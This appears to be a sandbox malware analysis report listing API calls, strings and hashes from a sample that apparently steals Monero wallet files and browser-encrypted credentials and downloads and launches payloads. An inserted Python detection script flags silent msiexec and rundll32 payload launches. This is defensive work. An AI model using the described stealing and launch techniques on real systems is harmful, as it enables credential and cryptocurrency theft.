                                                                                  • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
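The three ShellExecuteEx calls above, together with the string set (`/i "`, ` /passive`, `.msi`, `.dll`, `C:\Windows\system32\msiexec.exe`, `C:\Windows\system32\rundll32.exe`), describe a payload launch through two living-off-the-land binaries: a silent MSI install and a DLL started via rundll32. The following detection logic is an added example for a defender and is not Joe Sandbox output or code from the sample. It assumes Sysmon-style process-creation records with Image, CommandLine and ParentImage fields; the user-writable directory list and the parent-process allowlist are tuning assumptions, not facts from this report, and the events are constructed.

```python
"""Flag process-creation events matching the launch paths implied by the
ShellExecuteEx block: msiexec.exe /i "<payload>.msi" /passive and
rundll32.exe "<payload>.dll". Added example, not Joe Sandbox or sample code.
Events are constructed, Sysmon-style dicts (an assumed log format)."""
import re
from typing import Dict, List, Optional

# Payload path lands in group 1 (quoted) or group 2 (bare).
MSIEXEC_RE = re.compile(
    r'msiexec\.exe"?\s+/i\s+(?:"([^"]+\.msi)"|(\S+\.msi))(?=.*\s/passive\b)',
    re.IGNORECASE)
RUNDLL32_RE = re.compile(
    r'rundll32\.exe"?\s+(?:"([^"]+\.dll)"|(\S+\.dll))', re.IGNORECASE)
RULES = (("msiexec_passive_install", MSIEXEC_RE),
         ("rundll32_dll_launch", RUNDLL32_RE))

# Tuning assumptions (not from the report): directories a non-admin user can
# write to, and parents that legitimately start msiexec / rundll32.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\",
                 "\\downloads\\", "\\users\\public\\")
EXPECTED_PARENTS = {"explorer.exe", "svchost.exe", "services.exe", "msiexec.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def evaluate(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding when the command line matches a launch pattern and
    either the payload sits in a user-writable directory or the parent is
    not one that normally starts these binaries; otherwise None."""
    cmd = event.get("CommandLine", "")
    parent = _basename(event.get("ParentImage", ""))
    for rule, rx in RULES:
        m = rx.search(cmd)
        if not m:
            continue
        payload = m.group(1) or m.group(2)
        writable = _user_writable(payload)
        odd_parent = parent not in EXPECTED_PARENTS
        if writable or odd_parent:
            return {"rule": rule, "payload": payload, "parent": parent,
                    "user_writable": writable, "unexpected_parent": odd_parent}
    return None


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    return [f for f in (evaluate(e) for e in events) if f is not None]


# Constructed events; "dropper.exe" stands in for whatever launched the payload.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'"C:\Windows\system32\msiexec.exe" /i "C:\Users\u\AppData\Local\Temp\upd.msi" /passive',
     "ParentImage": r"C:\Users\u\AppData\Local\Temp\dropper.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'C:\Windows\system32\rundll32.exe "C:\Users\u\AppData\Roaming\svc.dll",Start',
     "ParentImage": r"C:\Users\u\AppData\Local\Temp\dropper.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\u\Downloads\tool.msi"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Only the first two constructed events produce findings: the `/passive` requirement keeps an interactive user install from matching, and a system DLL loaded by rundll32 under explorer.exe is left alone. Both thresholds are deliberately loose; real tuning depends on what the fleet's installers normally look like.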
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0041429E
                                                                                  • memset.MSVCRT ref: 004142B5
                                                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                                                                  • lstrcatA.KERNEL32(?,00909B30), ref: 0041430B
                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                                                                  • lstrcatA.KERNEL32(?,0090A028), ref: 00414333
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                                                    • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                                                    • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                    • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                                                                  • StrStrA.SHLWAPI(?,009099C8), ref: 004143F3
                                                                                  • GlobalFree.KERNEL32(?), ref: 00414512
                                                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                                                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                                                                  • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                   • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1191620704-0
                                                                                  • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                                                  • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                                                                  • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                                                  • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00B14505
                                                                                  • memset.MSVCRT ref: 00B1451C
                                                                                    • Part of subcall function 00B19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B19072
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B14553
                                                                                  • lstrcat.KERNEL32(?,0064A30C), ref: 00B14572
                                                                                  • lstrcat.KERNEL32(?,?), ref: 00B14586
                                                                                  • lstrcat.KERNEL32(?,0064A5D8), ref: 00B1459A
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B18FF7: GetFileAttributesA.KERNEL32(00000000,?,00B01DBB,?,?,0042565C,?,?,00420E1F), ref: 00B19006
                                                                                    • Part of subcall function 00B09F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 00B09FA0
                                                                                    • Part of subcall function 00B09F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 00B09FF9
                                                                                    • Part of subcall function 00B09C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B09C53
                                                                                    • Part of subcall function 00B09C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09C78
                                                                                    • Part of subcall function 00B09C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B09C98
                                                                                    • Part of subcall function 00B09C27: ReadFile.KERNEL32(000000FF,?,00000000,00B016F6,00000000), ref: 00B09CC1
                                                                                    • Part of subcall function 00B09C27: LocalFree.KERNEL32(00B016F6), ref: 00B09CF7
                                                                                    • Part of subcall function 00B09C27: CloseHandle.KERNEL32(000000FF), ref: 00B09D01
                                                                                    • Part of subcall function 00B19627: GlobalAlloc.KERNEL32(00000000,00B14644,00B14644), ref: 00B1963A
                                                                                  • StrStrA.SHLWAPI(?,0064A0D8), ref: 00B1465A
                                                                                  • GlobalFree.KERNEL32(?), ref: 00B14779
                                                                                    • Part of subcall function 00B09D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B05155,00000000,00000000), ref: 00B09D56
                                                                                    • Part of subcall function 00B09D27: LocalAlloc.KERNEL32(00000040,?,?,?,00B05155,00000000,?), ref: 00B09D68
                                                                                    • Part of subcall function 00B09D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B05155,00000000,00000000), ref: 00B09D91
                                                                                    • Part of subcall function 00B09D27: LocalFree.KERNEL32(?,?,?,?,00B05155,00000000,?), ref: 00B09DA6
                                                                                    • Part of subcall function 00B0A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B0A094
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B1470A
                                                                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 00B14727
                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00B14739
                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 00B1474C
                                                                                  • lstrcat.KERNEL32(00000000,00420FB8), ref: 00B1475B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1191620704-0
                                                                                  • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                                                  • Instruction ID: 0d8963393e6e3a3d17b47fb0e9a945a11c01ab917ab3421c9310d2f934a0ca42
                                                                                  • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                                                  • Instruction Fuzzy Hash: EB7130B6900218BBDB14FBE0DC89FEE77B9AF49300F4085D8B60596181EB75DB89CB51
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00401327
                                                                                    • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                                                    • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                                                    • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                                                    • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                                                    • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                                                                  • lstrlenA.KERNEL32(?), ref: 0040135C
                                                                                  • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008D4F10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                                                  • memset.MSVCRT ref: 00401516
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                  • API String ID: 1930502592-218353709
                                                                                  • Opcode ID: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                                                  • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                                                                  • Opcode Fuzzy Hash: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                                                  • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                                                                  APIs
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00906260), ref: 00406303
                                                                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0090B380,00000000,00000000,00400100,00000000), ref: 00406385
                                                                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00415383
                                                                                  • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                  • API String ID: 3532888709-1526165396
                                                                                  • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                                                  • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                                                  • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                                                  • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                                                  APIs
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                                                                  • StrCmpCA.SHLWAPI(?,00906260), ref: 00406147
                                                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                                                                  • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                                                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                                                                  • InternetCloseHandle.WININET(a+A), ref: 00406253
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00406260
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                  • String ID: a+A$a+A
                                                                                  • API String ID: 4287319946-2847607090
                                                                                  • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                                                  • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                                                                  • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                                                  • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • memset.MSVCRT ref: 00B10E83
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B10E9C
                                                                                  • lstrcat.KERNEL32(?,00420D7C), ref: 00B10EAE
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B10EC4
                                                                                  • lstrcat.KERNEL32(?,00420D80), ref: 00B10ED6
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B10EEF
                                                                                  • lstrcat.KERNEL32(?,00420D84), ref: 00B10F01
                                                                                  • lstrlen.KERNEL32(?), ref: 00B10F0E
                                                                                  • memset.MSVCRT ref: 00B10F34
                                                                                  • memset.MSVCRT ref: 00B10F48
                                                                                    • Part of subcall function 00B1AA87: lstrlen.KERNEL32(00B0516C,?,?,00B0516C,00420DDE), ref: 00B1AA92
                                                                                    • Part of subcall function 00B1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B1AAEC
                                                                                    • Part of subcall function 00B18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B18DED
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B19927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00B10DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00B19948
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00B10FC1
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B10FCD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                                                  • String ID:
                                                                                  • API String ID: 1395395982-0
                                                                                  • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                                                  • Instruction ID: 3be2872bc563f7c945eb68cd22dee43c13382dc5473b67ebb9f5b5f673543e85
                                                                                  • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                                                  • Instruction Fuzzy Hash: 898184B5511218ABCB14EBA0DD92FED77B9AF44704F8041D9B30966082EE747BC8CF5A
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                  • memset.MSVCRT ref: 00B10E83
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B10E9C
                                                                                  • lstrcat.KERNEL32(?,00420D7C), ref: 00B10EAE
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B10EC4
                                                                                  • lstrcat.KERNEL32(?,00420D80), ref: 00B10ED6
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B10EEF
                                                                                  • lstrcat.KERNEL32(?,00420D84), ref: 00B10F01
                                                                                  • lstrlen.KERNEL32(?), ref: 00B10F0E
                                                                                  • memset.MSVCRT ref: 00B10F34
                                                                                  • memset.MSVCRT ref: 00B10F48
                                                                                    • Part of subcall function 00B1AA87: lstrlen.KERNEL32(00B0516C,?,?,00B0516C,00420DDE), ref: 00B1AA92
                                                                                    • Part of subcall function 00B1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B1AAEC
                                                                                    • Part of subcall function 00B18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B18DED
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B19927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00B10DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00B19948
                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00B10FC1
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B10FCD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                                                  • String ID:
                                                                                  • API String ID: 1395395982-0
                                                                                  • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
